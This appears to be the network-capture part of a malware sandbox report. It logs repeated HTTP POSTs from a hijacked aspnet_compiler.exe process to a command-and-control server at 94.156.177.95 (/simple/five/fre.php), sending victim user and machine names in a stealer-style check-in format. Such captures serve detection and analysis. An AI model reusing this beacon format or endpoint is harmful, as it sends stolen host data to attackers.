Nov 15, 2024 18:15:29.439150095 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:29.444036007 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:30.400077105 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49923	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:30.553162098 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:30.558346033 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:32.028471947 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49932	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:32.180358887 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:32.185276031 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:33.186584949 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49936	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:33.338016033 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:33.342989922 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:34.312840939 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49942	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:34.456140995 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:34.461021900 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:35.454488039 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49949	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:35.601607084 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:35.606842041 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:36.557085037 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49956	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:36.934304953 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:36.942826986 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:37.889698029 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49965	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:38.035571098 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:38.040555954 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:39.001919985 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49971	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:39.154721022 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:39.160355091 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:40.095613956 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49978	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:40.252780914 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:40.257744074 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:41.246045113 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49985	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:41.397134066 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:41.402378082 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:42.357958078 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49991	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:42.519032001 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:42.524039984 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:43.495873928 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49998	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:43.643137932 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:43.648108959 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:44.607532978 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	50003	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:44.753181934 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:44.761342049 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:45.715318918 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50010	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:45.879076004 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:45.883898973 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:47.222376108 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50016	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:47.362961054 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:47.367954969 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:48.319152117 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50021	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:48.518177032 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:48.523171902 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:49.483989954 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50026	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:49.626610041 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:49.631500006 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:51.299175024 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Nov 15, 2024 18:15:51.301553011 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50030	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:51.439925909 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:51.452173948 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:52.389782906 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50039	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:52.545501947 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
Nov 15, 2024 18:15:52.550654888 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:53.531023026 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50044	94.156.177.95	80	2736	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:53.674910069 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 149 Connection: close
